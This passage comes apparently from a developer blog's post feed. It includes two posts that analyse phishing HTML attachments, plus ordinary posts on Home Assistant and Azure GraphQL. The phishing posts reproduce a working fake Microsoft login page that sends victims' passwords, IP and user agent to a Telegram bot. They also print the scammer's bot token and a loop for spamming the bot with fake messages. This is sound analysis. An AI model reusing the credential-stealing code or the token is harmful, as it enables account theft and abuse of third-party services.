we’ll see that 006d is m, meaning that we have an identifier of email. Bet you didn’t guess THAT did you!\nClearly, this particular version of the file has gone hard on the unicode identifiers, even down to \\u0064\\u006fc\\u0075m\\u0065\\u006e\\u0074.write, which is just document.write.\nThis brings us to the question of why, why would you convert all the JavaScript, or at least some of it, to unicode? I can only speculate, but I’d assume that they are doing it as a layer of obfuscation, it’s just another thing that makes the code less readable to anyone who goes snooping around in it and make them think that maybe it is legitimate in what it’s doing. It does come at the expense of size, going from 8.6KB to 17.8KB, which is why this isn’t a common form of obfuscation for served JavaScript, but if you’re running an offline file like this, it doesn’t really matter.\nDigging into Telegram In the last post I was saddened by the fact that I couldn’t use the Telegram API with the token that was in the email body as it was no longer authorised. This time though, I’m pleased to say that it is active, at least at the time of writing!\nSo, let’s poke it.\nFrom the JavaScript, we can see that the token is used to call the bot parts of the API, suggesting that it’s a valid bot token and nothing more, but let’s start trying to figure out the user info for the bot. 
I’m going to do this in JavaScript, for something a bit different, and we’ll start by getting the bot and chat info:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import "dotenv/config"; (async () => { const token = process.env.TELEGRAM_TOKEN || ""; const chat_id = process.env.CHAT_ID || ""; const telegramAPIBase = `https://api.telegram.org/bot${token}`; let res = await fetch(`${telegramAPIBase}/getMe`, { method: "POST" }); let json = await res.json(); console.log("me", json); res = await fetch(`${telegramAPIBase}/getChat`, { method: "POST", body: JSON.stringify({ chat_id }), headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, }); json = await res.json(); console.log("chat", json); })(); This sees the following dumped to the console:\nme { ok: true, result: { id: 5742807394, is_bot: true, first_name: 'countduque', username: 'countduque11_bot', can_join_groups: true, can_read_all_group_messages: false, supports_inline_queries: false } } chat { ok: true, result: { id: 5486255038, first_name: 'Count', last_name: 'Duque', type: 'private' } } So our bot is named countduque and they are in a private chat (which isn’t surprising really), but what is surprising, and somewhat annoying, is that the user has can_read_all_group_messages set to false, which is the default for bots. The impact of this is that the bot is unable to read out the messages of the chat. I had assumed that they were using the bot as the input and output processing, but it seems like it’s just feeding the data in and either they have a person on the other end that reads the messages, or a different bot that reads them. Given the semi-structured nature of the input, I’m guessing they have another bot that’s reading the messages.\nTo validate, I use the getUpdates endpoint, but through all my testing, I was unable to get back any messages, even when I submitted them I was unable to read them back immediately… queue sad face.\nI guess that I’m not going to be able to get much further with this bot… so instead I spammed it with 1000000 fake messages… as you do.\nSummary I’m enjoying this exploration into the spammer emails. 
It was interesting to see the use of unicode for identifier names as a way to obfuscate the code a little more (at least, so I assume), and I’m not surprised that I wasn’t able to pull the messages from the Telegram chat, just saddened that I couldn’t.\nI’ll just have to keep an eye out for the next one that comes in and see if I can learn any more.\nOh, and I’d totally not encourage anyone to use the token/chat ID that was in this to run code such as this:\n1 2 3 4 5 6 7 8 9 10 11 for (let i = 0; i < 1000000; i++) { const message = `====== O365 Result ======\\\\r\\\\nEmail: ${email}\\\\r\\\\nPassword1: ${password}\\\\r\\\\nPassword2: ${password}\\\\r\\\\nIP: https://ip-api.com/0.0.0.0\\\\r\\\\nUser-Agent: Mozilla/4.02 [en] (X11; I; SunOS 5.6 sun4u)\\\\r\\\\n===================`; fetch(`${telegramAPIBase}/sendMessage`, { method: "POST", body: JSON.stringify({ chat_id: chat_id, text: message }), headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, }); } I really wouldn’t… 😏\n", "id": "2022-08-23-more-phishing-attempts" }, { "title": "Building a Smart Home - Part 3 \"Smart\" Appliances", "url": "https://www.aaron-powell.com/posts/2022-08-18-building-a-smart-home---part-3-smart-appliances/", "date": "Thu, 18 Aug 2022 06:21:32 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to start automating, and let's start with our appliances", "content": "After exploring a bit of the thought process on the how and why with my journey to a smart home, it’s time to look at a what, and for that I’m going to tackle one of the problems I identified in the last post:\nForgetting the washing machine was done to hang the laundry out\nTo give a bit of context, my home office is upstairs while the laundry is downstairs, and what this means is that I generally don’t hear when the appliances finish their cycle, and if I don’t realise until half way through the day, then it’s likely that our washing isn’t getting dry unless it goes in the dryer (and because we don’t have solar in yet, I try to reduce the amount of time we use that as it’s expensive!). Queue sad Aaron.\nWhile yes, there’s a whole heap of wifi-enabled appliances, we got new ones with the new house and they are not wifi-enabled, so going out and buying a whole new set is not something that’s in the budget.\nSo, how do we tackle this?\nIs this thing on How do we know if an appliance is running? The simplest way to do that is looking at whether it’s using power or not and apply some basic logic of if using power - state:running, if not using power and last state:running - state:finished.\nThis means we’re going to need to figure out whether the appliance is drawing power and to do that we’ll get some smart switches to do power monitoring. 
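Spelled out as pseudocode, the state logic I’m chasing is roughly this (it’s not what ends up in Home Assistant, just the idea):
// watts comes from a power monitoring plug, lastState is whatever we decided last time
function applianceState(watts, lastState) {
  if (watts > 0) return "running";
  if (lastState === "running") return "finished";
  return "idle"; // not running now, wasn't running before - nothing to report
}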
There’s a heap of switches on the market, across all protocols from wifi to ZigBee, but since I’m not ready to dive into the world of ZigBee or Z-Wave yet, I went with the TP-Link Kasa KP115 because they were easy to get (I got them from Bunnings, but it seems Bunnings no longer stocks them), they have a very small profile, and they connect to Home Assistant using the TPLink Kasa integration.\nI grabbed myself three of them (washing machine, dryer and dishwasher), and set them up in the Kasa app.\nI did set up a Kasa Cloud account for this but I’ve since learnt that they do support local control, so you might not need to do that, but I haven’t had time (or the motivation) to go back and reconfigure the setup.\nWith the devices on the network it was only a matter of time until Home Assistant picked them up and then they were available as entities for me:\nGreat, time to see what it can do.\nLooking at the data When the device was added to Home Assistant it gave me several new sensors. This is the view of my washing machine (which ran a cycle earlier today):\nFrom an automation standpoint, the Current Consumption is going to be most relevant, as that’s reporting the Watts being drawn through the plug. We can get a good view of this over time:\nI reckon we can work with this. So, armed with our insights, let’s make an automation.\nAutomation - take 1 The first automation I created was very simplistic:\n1 2 3 4 5 6 7 8 9 10 11 12 13 alias: Is washing done description: "" mode: single trigger: - platform: state entity_id: - sensor.washing_machine_current_consumption to: "0" condition: [] action: - service: notify.mobile_app_aaron_s_phone data: message: Washing done This automation will run when the washing machine stops drawing power, and that seems right doesn’t it? If it’s not drawing power, it’s done, isn’t it?\nWell, the blow-up of notifications on my phone would suggest otherwise… it turns out that this automation works, but doesn’t work quite right. Let’s go back to the graph from before.\nDo you see the problem?\nThe problem is I’m making a false assumption that the power draw is consistent, when in reality, power goes up and down, depending on the phase of the wash cycle, and as a result, we hit the zero power draw trigger with a lot of false positives.\nAutomation - take 2 So it turns out that what I really should be doing is using the for parameter of the trigger and have it say if the power is zero for <some duration> - finished (there’s a sketch of that raw trigger below). Because I’m sure this is a solved problem, I decided to search the Home Assistant forums and came across this blueprint, which you can install here:\nIf you’ve not used a blueprint, it’s a pre-configured automation in which you just plug in the relevant values, and this one is designed around appliance finished scenarios. 
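For reference, the raw version of that idea is just the take 1 trigger with a for duration added - something like this (the two minutes is a number plucked out of the air; the blueprint lets you tune it properly):
trigger:
  - platform: state
    entity_id:
      - sensor.washing_machine_current_consumption
    to: "0"
    for: "00:02:00"
action:
  - service: notify.mobile_app_aaron_s_phone
    data:
      message: Washing done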
Once the blueprint is imported, you can use it as the base for a new automation:\nThe other thing I like about this blueprint is that it has both start and stop actions that can be configured, so when the appliance crosses the threshold to be considered as started you can do something and then when it’s completed do something else.\nHere’s what the automation now looks like, and if we hit save, it’s good to go (and my phone won’t get spammed!).\nBonus points - tracking state Mainly for fun, but also because I think it might be useful in the future, I decided to expand the actions of the automation to give more rich information about the appliance, specifically, track when the appliance last started, and what its current state is.\nThis will mean I can make my dashboard look like this:\nFor this, I created two inputs, date time and text. Next, in the on start phase of the blueprint, I set the values of those to their relative states, and then when it’s finished, I change the text input from Running to Finished.\nHere’s the complete automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 alias: "Appliance finished: Washing" description: "" use_blueprint: path: >- sbyx/notify-or-do-something-when-an-appliance-like-a-dishwasher-or-washing-machine-finishes.yaml input: power_sensor: sensor.washing_machine_current_consumption actions: - service: notify.mobile_app_aaron_s_phone data: message: Washing finished! title: 🧺 Laundry - service: input_text.set_value data: value: Finished target: entity_id: input_text.washing_machine_enriched_status - if: - condition: time before: "19:00:00" after: "07:00:00" weekday: - mon - tue - wed - thu - fri then: - service: tts.google_translate_say data: entity_id: media_player.whole_house message: Washing finished else: [] pre_actions: - service: input_text.set_value data: value: Running target: entity_id: input_text.washing_machine_enriched_status - service: input_datetime.set_datetime data: datetime: "{{ now().strftime('%Y-%m-%d %H:%M:%S') }}" target: entity_id: input_datetime.washing_machine_last_started Setting the last_started requires a value to be set using a template, which you can only do in YAML, but it just grabs now() and formats it for storage.\nAlso, for fun, I have it announce on all our Google Homes when the washing finishes using the Text To Speech (TTS) service, but that’s wrapped in a condition that only allows it Monday - Friday between 7am and 7pm, so not to wake anyone. Ask me how I knew to add that 😅!\nSummary Here we’ve seen how I turned a dumb appliance into a smart one, and done a small quality of life improvement.\nBy using power monitoring and a simple automation, we can determine when an appliance is running, and by tracking that, work out when it’s finished to give you the feedback needed.\nI’ve actually had this automation running for a few months now (I originally set it up at our rental), and it’s by far the most relied upon one that I have.\nSure, there has been a few hiccups - the Kasa plugs occasionally lose connection to Home Assistant (sometimes they go into ’local only’ mode but I’m not sure what triggers that), but since I put them on fixed IP’s they’ve been better.\nI’ve got some ideas on how to improve the notifications more, like if I’m out, don’t send the notification until I’m home, but that’s well down the priority list. 
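One thing I glossed over above is what the two helpers the automation writes to actually look like - they’re nothing fancy (the entity IDs match what the automation references; the friendly names are just my guess at sensible labels):
input_text:
  washing_machine_enriched_status:
    name: "Washing machine: status"
input_datetime:
  washing_machine_last_started:
    name: "Washing machine: last started"
    has_date: true
    has_time: true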
For now, this is doing the job nicely.\n", "id": "2022-08-18-building-a-smart-home---part-3-smart-appliances" }, { "title": "Breaking Down Another Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2022-08-18-breaking-down-another-phishing-attempt/", "date": "Thu, 18 Aug 2022 01:19:21 +0000", "tags": [ "security" ], "description": "Look, another phishing attempt. Let's unpack this one", "content": "Earlier this year I did a post about a phishing attempt I received. While I get these somewhat frequently, I decided to have a dig into the one I received today for no reason other than it seemed interesting.\nThe email Here’s the email I received:\nThis is super low effort and very clear that it’s a phishing attempt. There’s a huge string of text and numbers in the “from” name. What does it mean by “14 inbox delivery”? The fact that there’s a validation form on a random HTML attachment makes it painfully obvious that I shouldn’t open this.\nI tried to figure out what 900150983cd24fb0d6963f7d28e17f72900150983cd24fb0d6963f7d28e17f72900150983cd24fb0d6963f7d28e17f72 means from the sender, but I couldn’t find anything meaningful in any decryption. I thought it might’ve been a Bitcoin address, but it’s too long for that, and nothing came back from standard web searches, so 🤷. If you figure it out - let me know!\nLet’s download the HTML file and open it in VS Code.\nThe attachment contents 1 2 3 4 5 6 7 8 9 <script> var email = "<yes, my real email was here>"; var token = "5372900524:AAEesupk4LMrZO_4PONhPBHIpFu3ey-6O20"; var chat_id = 5510932248; var data = atob( "<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Sign in to your account</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">    
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
    <script>
        $(document).ready(function() {$("#displayName").empty().append(email); $.getJSON("https://api.ipify.org?format=json", function(data) {$("#gfg").html(data.ip);})});
    </script>
</head>
<body class="cb" style="display: block;">
<p id="gfg" style="display: none;"></p>
<form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" action="">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
</div></div>
<div class="outer">
    <div class="template-section main-section">
        <div class="middle ext-middle">
            <div class="full-height">
<div class="flex-column">
    <div class="win-scroll">
        <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
        <div><img class="logo" role="img" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"></div>
        <div role="main">
<div class="animate slide-in-next">
        <div >
<div class="identityBanner">
    <div id="displayName" class="identity"></div>
</div></div>
    </div>
    <div class="pagination-view animate has-identity-banner slide-in-next">
    <div>

<div id="loginHeader" class="row title ext-title">
    <div role="heading" aria-level="1">Enter password</div>
</div>
<div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
<div class="row">
    <div class="form-group col-md-24">
        <div class="placeholderContainer">
            <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
</div>
    </div>
</div>
<div>
<div class="position-buttons">
    <div>
        <div class="row">
            <div class="col-md-24">
                <div class="text-13">
                    <div class="form-group">
                        <a id="idA_PWD_ForgotPassword" role="link" href="#">Forgotten my password</a>
                    </div>
<div class="form-group">
</div>
        <div class="form-group">
            <a id="i1668" href="#">Sign in with another account</a>
        </div></div></div></div>
    </div>

    <div class="win-button-pin-bottom">
        <div class="row">
            <div><div class="col-xs-24 no-padding-left-right button-container">
    <div class="inline-block">
        <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Sign in">
    </div>
</div></div>
        </div>
    </div>
</div></div>
    </div>
</div></div></div></div>
    </div>
</div></div>
        </div>
    </div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div></div></div>
</form>
<script>
    var count = 0;
    var pswd1;
    document.getElementById("idSIButton9").addEventListener("click", function(e) {
    e.preventDefault();

    var pswd = document.getElementById('i0118').value;
    if (pswd == null || pswd == ""){
        document.getElementById('errorpw').innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`;
        setTimeout(() => {document.getElementById('errorpw').innerHTML = '';}, 3000);}
    else if(pswd.length < 5){
        document.getElementById('errorpw').innerHTML = "Your account password is too short.";
        setTimeout(() => {document.getElementById('errorpw').innerHTML = ''; document.getElementById("i0281").reset();}, 3000);
    } else if (count<1){
        pswd1 = document.getElementById('i0118').value;
        document.getElementById('errorpw').innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`;
        document.getElementById("i0281").reset(); count++;}
    else {
        var IP = document.getElementById('gfg').textContent;
        var message = `====== O365 Result ======\r\nEmail: ${email}\r\nPassword1: ${pswd1}\r\nPassword2: ${pswd}\r\nIP: https://ip-api.com/${IP}\r\nUser-Agent: ${navigator.userAgent}\r\n===================`;
        var settings = {
            "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + token + "/sendMessage",
            "method": "POST", "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
            "data": JSON.stringify({"chat_id": chat_id, "text": message})}
        $.ajax(settings).done((response) => {window.location.replace('https://portal.office.com/servicestatus');});
    } 
    }); 
</script>
</div></body></html>" ); document.write(data); </script> So that’s interesting, it’s just a script tag with some JavaScript variables and a giant blob that will contain some HTML that will get written to the body. I guess we better parse out that blob and see what we’re dealing with.\nAs the HTML it generates is quite long, I’ve popped it into a gist that you can find here. And what does it look like?\nIt looks like the login screen to a Microsoft account, prompting me to enter the password.\nNote: I removed the JS from the file before loading it in the browser, just for extra safety.\nBreaking down how it works Clearly it’s trying to capture my password for my Microsoft account (MSA), but how will it do that, and how will they get it to themselves since this is an offline file? For that, we need to dig into the JavaScript a bit. There’s two scripts that run on the page, the first one is quite straight forward:\n1 2 3 4 5 6 $(document).ready(function () { $("#displayName").empty().append(email); $.getJSON("https://api.ipify.org?format=json", function (data) { $("#gfg").html(data.ip); }); }); It’s pushing my email (which was in the original file) to a field so I think I’m signing in, and then it’s calling a service to get my public IP.\nOf interesting note, they are using jQuery here and if we look at the script include a few lines above, we’ll notice it’s version 3.4.1, and that was released in 2019, so it’s possible that this basic phishing script has been floating around for a long time. Also, I wondered about why they’d use jQuery and not the native fetch API, as that’d reduce the external dependencies, and thus, the number of points of failure. While I don’t know the true motivations of this scammer, my guess would be that since a victim of this is someone who isn’t tech savvy, there’s a chance they are still using an outdated browser such as Internet Explorer, so jQuery would mean they don’t have to worry about browser compatibility and hit as wider target as possible.\nOk, back on topic, what’s the other script block doing?\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 var count = 0; var pswd1; document.getElementById("idSIButton9").addEventListener("click", function (e) { e.preventDefault(); var pswd = document.getElementById("i0118").value; if (pswd == null || pswd == "") { document.getElementById( "errorpw" ).innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; }, 3000); } else if (pswd.length < 5) { document.getElementById("errorpw").innerHTML = "Your account password is too short."; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; document.getElementById("i0281").reset(); }, 3000); } else if (count < 1) { pswd1 = document.getElementById("i0118").value; document.getElementById( "errorpw" ).innerHTML = `Your account or password is incorrect. 
if you don't remember your password, <a href="#">reset it now.</a>`; document.getElementById("i0281").reset(); count++; } else { var IP = document.getElementById("gfg").textContent; var message = `====== O365 Result ======\\r\\nEmail: ${email}\\r\\nPassword1: ${pswd1}\\r\\nPassword2: ${pswd}\\r\\nIP: https://ip-api.com/${IP}\\r\\nUser-Agent: ${navigator.userAgent}\\r\\n===================`; var settings = { async: true, crossDomain: true, url: "https://api.telegram.org/bot" + token + "/sendMessage", method: "POST", headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, data: JSON.stringify({ chat_id: chat_id, text: message, }), }; $.ajax(settings).done((response) => { window.location.replace("https://portal.office.com/servicestatus"); }); } }); Now this looks more like it, here’s how they are going to get your information. Let’s break it down step-by-step.\nTo start, they have a click handler on the Sign In button and when clicked they grab the password from the password field. Then we enter a chain of if blocks.\n1 2 3 4 5 6 7 8 if (pswd == null || pswd == "") { document.getElementById( "errorpw" ).innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; }, 3000); } Blank password test, sure, makes logical sense. Interesting that they clear out the error message after a period too, like, what’s the point in that? Ok, next conditional test:\n1 2 3 4 5 6 7 8 if (pswd.length < 5) { document.getElementById("errorpw").innerHTML = "Your account password is too short."; setTimeout(() => { document.getElementById("errorpw").innerHTML = ""; document.getElementById("i0281").reset(); }, 3000); } Hahah they are enforcing a minimum of 5 characters on their password! I think MSA has a minimum length of 8 though, but I’ll admit to having never investigated it. Hats off for trying to make it seem legit, although I’m saddened, they didn’t add anything more around password complexity. 🤣\nThis brings us to the third branch:\n1 2 3 4 5 6 7 8 if (count < 1) { pswd1 = document.getElementById("i0118").value; document.getElementById( "errorpw" ).innerHTML = `Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a>`; document.getElementById("i0281").reset(); count++; } Now this is interesting. 
The variable count is a globally scoped one on the page that starts out at 0, so assuming you’ve provided a password and it was longer than 5 characters, you’re going to land in this branch where it puts the password you entered into pswd1, which is a globally scoped variable, before then showing you an error message and increasing the count.\nWhat we can assume here is that they are using this as a fake out to the victim, having them think they incorrectly entered the password, so that they enter it a second time, and that lands us in the final branch of our code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 var IP = document.getElementById("gfg").textContent; var message = `====== O365 Result ======\\r\\nEmail: ${email}\\r\\nPassword1: ${pswd1}\\r\\nPassword2: ${pswd}\\r\\nIP: https://ip-api.com/${IP}\\r\\nUser-Agent: ${navigator.userAgent}\\r\\n===================`; var settings = { async: true, crossDomain: true, url: "https://api.telegram.org/bot" + token + "/sendMessage", method: "POST", headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, data: JSON.stringify({ chat_id: chat_id, text: message, }), }; $.ajax(settings).done((response) => { window.location.replace("https://portal.office.com/servicestatus"); }); When the victim runs this code block it’s building up a message that contains their email (from the original script you download), the password they entered and were told was wrong, then the password they entered this time, plus some metadata like their IP and user agent. Interestingly, they are using a template literal which isn’t supported in IE, so maybe my assertion on why they used jQuery is wrong and they are doing it because they are lazy (odd that they don’t use the template literal for the url in the AJAX settings though…). I find the double-password trick quite an interesting one, as it suggests that they are anticipating that people could do a mistake, so by having them prompt twice, the victim will either validate that their password by entering the same one again - which will work and they are none the wiser, or they’ll hand over a secondary password that they may use on other services.\nThe result of this is a message payload like so:\n====== O365 Result ====== Email: foo@bar.com Password1: abc123 Password2: abc123 IP: https://ip-api.com/1.1.1.1 User-Agent: ... =================== This payload is then sent to a Telegram chat, using the token and chat_id from the downloaded attachment, before the user is redirected to the Office status page, leaving them none the wiser that their details have been sent away.\nSummary Sadly, it looks like this token has been revoked, as when I tried to use it against the Telegram API (even replicating the sendMessage call but with a cough different message), I was getting a 401, meaning I couldn’t try and dig into the chat itself.\nLike last time, this was interesting, looking at how the scammer is trying to get the information from the victim. 
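(As an aside, if you ever want to check whether a leaked bot token like this is still alive, a single call to the Bot API's getMe method is enough - the line below is purely illustrative, with the token as a placeholder; a 401 coming back means it's been revoked.)
# Substitute the bot token from the attachment; 401 Unauthorized means it's dead
curl -s "https://api.telegram.org/bot<bot-token>/getMe"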
I find the use of the fake out on password failing to get them to validate their password (or give over a secondary password) quite a clever way to go about collecting credentials and reducing the risk of getting invalid ones out of it.\nAnd with that, this email is getting flagged in M365 as phishing and let’s hope that improves the phishing detection, so it lands in less inboxes.\n", "id": "2022-08-18-breaking-down-another-phishing-attempt" }, { "title": "GraphQL on Azure: Part 10 - Synthetic GraphQL Custom Responses", "url": "https://www.aaron-powell.com/posts/2022-08-17-graphql-on-azure-part-10-synthetic-graphql-custom-responses/", "date": "Wed, 17 Aug 2022 05:01:21 +0000", "tags": [ "azure", "graphql" ], "description": "With Synthetic GraphQL we created resolvers to pass-through to REST calls, but what if we want to have resolvers on types other than Query", "content": "Continuing on from the last post in which we used Azure API Management’s (APIM) Synthetic GraphQL feature to create a GraphQL endpoint for my blog, I wanted to explore how to add a completely new field to our type - Related Posts.\nUsing the schema editor in APIM I added a new field to the Post type of related(tag: String): [Post!], so our type now looks like this:\n1 2 3 4 5 6 7 8 9 10 type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! related(tag: String): [Post!] } The way this field resolver will work is that if you provide a tag argument to related then it’ll return posts that also have that tag (while first validating that the tag is a tag of the Post), and if you don’t provide a tag argument, it’ll return all posts that have the same tags as the current Post.\nAside: I have updated the /api/tag endpoint that if you provide a comma-separated string, it’ll split those and return posts that match all those tags as it previously only supported a single tag.\nBuilding a resolver As this is an entirely fabricated field, we’re going to have to make a custom resolver in APIM using the set-graphql-resolver policy. The resolver is going to need two pieces of data, the tags of the current Post and the tag argument provided. 
As we learnt in the last post, we can get the arguments off the GraphQL request context as context.Request.Body.As<JObject>(true)["arguments"], but what about the Post?\nIn GraphQL, the resolver that’s being executed has access to the parent in the graph, and in our case the parent of related is the Post, and we can access that by context.ParentResult.\nWith that setup, we can write our resolver like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <set-graphql-resolver parent-type="Post" field="related"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var postTags = context.ParentResult.AsJObject()["tags"].ToObject<string[]>().ToList(); var requestedTag = context.Request.Body.As<JObject>(true)["arguments"]["tag"].ToString(); if (!string.IsNullOrEmpty(requestedTag)) { if (postTags.IndexOf(requestedTag) < 0) { return null; } return $"https://www.aaron-powell.com/api/tag/{requestedTag}"; } return $"https://www.aaron-powell.com/api/tag/{string.Join(",", postTags)}"; }</set-url> </http-request> </http-data-source> </set-graphql-resolver> Notice that this time the parent-type is Post not Query, and we have a slightly more complex bit of C# code that generates the URL we’ll call, applying the logic that was stated above.\nLet’s fire off the request and see what we get back:\n1 2 3 4 5 6 7 8 9 10 query { post(id: "2022-08-16-graphql-on-azure-part-9-rest-to-graphql") { title tags related { title tags } } } Great, it’s worked as expected… except we ended up with the post that we specified the ID of in the related posts. While that might be technically true that it’s related to itself, it’s not really what we’re expecting.\nCleaning our results We’re going to want to do something that removes the current post from its related posts, and to do that we’re going to need to either make our REST API aware of the current Post and filter it out, or make our resolver smarter.\nGoing and rewriting the backend API doesn’t seem like the logical choice, after all, the point of Synthetic GraphQL is that we’re exposing non-graph data as a graph, so we probably don’t want to rework our API to be more “GraphQL ready”. Instead, we can do some post-processing in the data before sending it to the client, using the http-response part of our policy and defining a set-body transformation policy.\nWith set-body, we need to provide a template to execute, and this can be a Liquid template or C#. Since I’m not familiar with Liquid, but I am with C#, we’re going to stick with that. 
This template is going to need to get the id of the current post (which is the parent of the resolver), then iterate through all the posts from the /tags call, and remove the current post from the result set.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <http-response> <set-body>@{ var parentId = context.ParentResult.AsJObject()["id"].ToString(); var posts = context.Response.Body.As<JArray>(); var response = new JArray(); foreach (var post in posts) { if (post["id"].ToObject<string>() != parentId) { response.Add(post); } } return response.ToString(); }</set-body> </http-response> What we see here is that we used the context.ParentResult to find the id, then parsed the current response as a JArray (since we know that the REST call returned a JSON array), then using a foreach loop, we check the posts and create a new JArray containing the cleaned result set, which we finally return as a string.\nThis makes our whole resolver look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <set-graphql-resolver parent-type="Post" field="related"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var postTags = context.ParentResult.AsJObject()["tags"].ToObject<string[]>().ToList(); var requestedTag = context.Request.Body.As<JObject>(true)["arguments"]["tag"].ToString(); if (!string.IsNullOrEmpty(requestedTag)) { if (postTags.IndexOf(requestedTag) < 0) { return null; } return $"https://www.aaron-powell.com/api/tag/{requestedTag}"; } return $"https://www.aaron-powell.com/api/tag/{string.Join(",", postTags)}"; }</set-url> </http-request> <http-response> <set-body>@{ var parentId = context.ParentResult.AsJObject()["id"].ToString(); var posts = context.Response.Body.As<JArray>(); var response = new JArray(); foreach (var post in posts) { if (post["id"].ToObject<string>() != parentId) { response.Add(post); } } return response.ToString(); }</set-body> </http-response> </http-data-source> </set-graphql-resolver> Let’s make the GraphQL call again:\nFantastic, we’re now only getting the data that we expect.\nSummary This post builds on the last one in how to use Synthetic GraphQL to create a GraphQL endpoint from a non-GraphQL backend, but we took it one step further and created a field on our GraphQL type that doesn’t exist in our original backend model. And this is what makes Synthetic GraphQL really shine, that we can take our backend and model it in the way that makes the most sense for consumers of it in a graph design.\nYes, it might not be as optimised as if you were writing a true GraphQL server, given that with this particular example doesn’t optimise the sub-resolver calls, but that’s something for a future post. 😉\n", "id": "2022-08-17-graphql-on-azure-part-10-synthetic-graphql-custom-responses" }, { "title": "GraphQL on Azure: Part 9 - REST to GraphQL", "url": "https://www.aaron-powell.com/posts/2022-08-16-graphql-on-azure-part-9-rest-to-graphql/", "date": "Tue, 16 Aug 2022 00:52:22 +0000", "tags": [ "graphql", "azure" ], "description": "It can be a lot of work to rewrite your APIs to GraphQL, but what if we could do that on the fly", "content": "Throughout this series we’ve been exploring many different aspects of using GraphQL in Azure, but it’s always been from the perspective of creating a new API. 
While there are a certain class of problems which support you starting from scratch, it’s not uncommon to have an existing API that you’re bound to, and in that case, GraphQL might not be as easy to tackle.\nHere’s a scenario that I want to put forth, you’ve got an existing API, maybe it’s REST, maybe it’s a bespoke HTTP API, none the less you’re building a new client in which you want to consume the endpoint as GraphQL. We could go down the path of creating an Apollo Server and using the RESTDataSource, or using HotChocolate’s REST support, but for both of these approaches we’re having to write our own server and deploy some new infrastructure to run it.\nWhat if we could do it without code?\nIntroducing Synthetic GraphQL At Build 2022 Azure API Management (APIM) released a preview of a new feature called Synthetic GraphQL. Synthetic GraphQL allows you to use APIM as the broker between your GraphQL schema and the HTTP endpoints that provide the data for it, meaning you to convert a backend to GraphQL without having to implement a custom server, instead you use APIM policies.\nLet’s take a look at how to do this, and for that, I’m going to add an API to my blog.\nBuilding a REST API for my blog I’ve created a really basic REST API for my blog, that takes the JSON file generated for my search feature and exposes it using Azure Functions as /post for all posts, /post/:id for a specific post, and /tag/:tag for posts 